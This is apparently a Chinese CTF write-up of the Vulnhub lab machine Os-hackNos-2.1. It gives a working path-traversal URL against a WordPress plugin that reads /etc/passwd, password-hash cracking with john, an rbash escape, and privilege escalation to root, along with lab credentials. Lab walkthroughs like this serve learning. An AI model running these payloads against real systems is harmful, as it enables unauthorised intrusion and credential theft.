【甄选靶场】Vulnhub百个项目渗透——项目四十九：Os-hackNos-2.1（lfi,密码爆破）

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目四十九：Os-hackNos-2.1（lfi,密码爆破）

---

🔥系列专栏：Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年10月23日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

---

前言

本文章仅用作实验学习，实验环境均为自行搭建的公开vuinhub靶场，仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录，不做任何导向。请勿在现实环境中模仿，操作。

---

信息收集

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94364e716a83e2c11ea9526445f62980 (RSA)
|   256 b4ce5ac33f4052a6efdcd829f32cb5d1 (ECDSA)
|_  256 096c17a1a3b4c778b9adecde8f64b17b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)

遇到了这种默认页面没说的，nikto,dirb,wfuzzing一顿上，扫完目录扫后缀

但是后缀啥也没有
反而简单的扫个目录让我发现了他是wp的站
于是就开始用wpscan

发现了低版本插件，这个版本插件去谷歌能搜出来存在一个lfi
下面这个登陆页面也出来了，弱口令无效

gracemedia-media-player插件

http://192.168.2.235/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

这是公开的，可以搜到谷歌

rohit❌1000:1000:hackNos:/home/rohit:/bin/bash
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/
但是rohit登陆不上
看到这个flag是加密过的
用john爆破一下

john --wordlist=/root/Desktop/rockyou.txt rong
john --show rong

那么可能就是账号flag，密码topsecret
ssh登陆（因为这个也登不进去wp后台，所以只能登ssh）

发现rbash

rbash绕过

网上搜一个rbash绕过的文章。然后挨个试，最后实出来了

python -c 'import pty;pty.spawn ("/bin/bash")'

然后跑linpeas.sh
本地数据库
还有那个能让我直接提权的小朋友，我要搞定它
然后还是跑出来了一个backups的文件夹

放到john解密

echo '$1$rohit$01Dl0NQKtgfeL08fGrggi0' > rong
john --wordlist=/root/Desktop/rockyou.txt rong
得到密码如下
!%hack41  

su rohit
!%hack41 
sudo -l 
sudo su
就可以提权了
    

剩下的发现

还发现了一个数据库密码泄漏

/var/www/html/tsweb/wp-config.php 

账号密码如下
wpuser
hackNos-2.com

查到的数据库中的账号密码如下
但是这个密码揭秘不出来
那就修改密码
然后登入

这里登陆进来其实也可以搞，但我饿了，下次再说吧，反正已经拿到root了